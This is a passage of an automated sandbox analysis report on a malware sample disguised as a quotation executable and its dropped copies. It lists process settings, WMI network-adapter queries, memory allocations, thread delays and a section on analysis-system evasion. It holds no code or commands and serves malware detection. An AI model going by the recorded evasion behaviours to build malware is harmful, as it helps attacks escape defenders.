                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: rQuotation3200025006.exe PID: 6744, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Memory allocated: 8A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Memory allocated: 26B0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Memory allocated: 2560000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Memory allocated: 7800000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Memory allocated: 8800000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Memory allocated: 89C0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Memory allocated: 99C0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Memory allocated: 1190000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Memory allocated: 2C60000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Memory allocated: 1190000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Memory allocated: D20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Memory allocated: 26A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Memory allocated: 2500000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Memory allocated: 72F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Memory allocated: 82F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Memory allocated: 8490000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Memory allocated: 9490000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Memory allocated: 18C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Memory allocated: 34B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Memory allocated: 32F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: AA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 24D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 22C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 7280000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 8280000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 8430000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 9430000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 3020000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 31F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 51F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 2C90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 2ED0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 2D10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 7C40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 8C40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 8DF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 9DF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 32C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 3360000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory allocated: 5360000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 600000
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 599875
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 599765
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 599656
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 599546
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 599437
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 599328
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 599218
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 599109
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 598999
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 598889
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 598781
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 598672
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 598561
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 598451
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 598343
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 598234
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 598124
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 598002
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 597789
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 597683
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 597553
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 597422
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 597308
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 597187
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 597078
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 596968
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 596859
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 596750
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 596640
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 596531
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 596417
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 596297
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 596187
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 596078
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 595968
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 595859
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 595749
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 595639
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 595531
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 595410
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 595279
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 595169
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 594864
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 594734
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 594585
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 594468
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 594359
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 594244
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 594125
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Thread delayed: delay time: 594015
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 599859
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 599750
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 599640
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 599531
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 599421
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 599312
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 599203
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 599093
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 598984
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 598874
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 598726
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 598609
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 598499
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 598390
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 598281
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 598171
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 598059
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 597953
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 597843
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 597317
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 597165
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 597049
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 596921
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 596812
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 596697
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 596574
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 596468
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 596302
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 596171
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 596062
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 595949
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 595843
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 595734
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 595624
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 595515
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 595406
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 595268
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 595146
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 594450
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 594343
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 594234
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 594125
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 594015
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 593906
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 593794
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 593687
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 593578
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 593464
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Thread delayed: delay time: 593310
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 599890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 599768
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 599640
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 599454
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 599217
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 599000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598671
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598453
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598343
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598125
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597906
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597796
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597687
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597578
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597468
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597359
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597250
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597140
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597031
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596921
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596812
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596703
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596593
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596484
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596375
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596260
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596142
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 595905
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 595791
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 595679
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 595575
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 595468
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 595358
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 599765
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 599654
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 599547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 599327
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 599218
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598994
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598668
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598453
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598339
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598125
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 598015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597906
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597797
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597687
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597578
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597468
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597359
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597250
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597140
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 597031
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596915
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596812
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Thread delayed: delay time: 596703
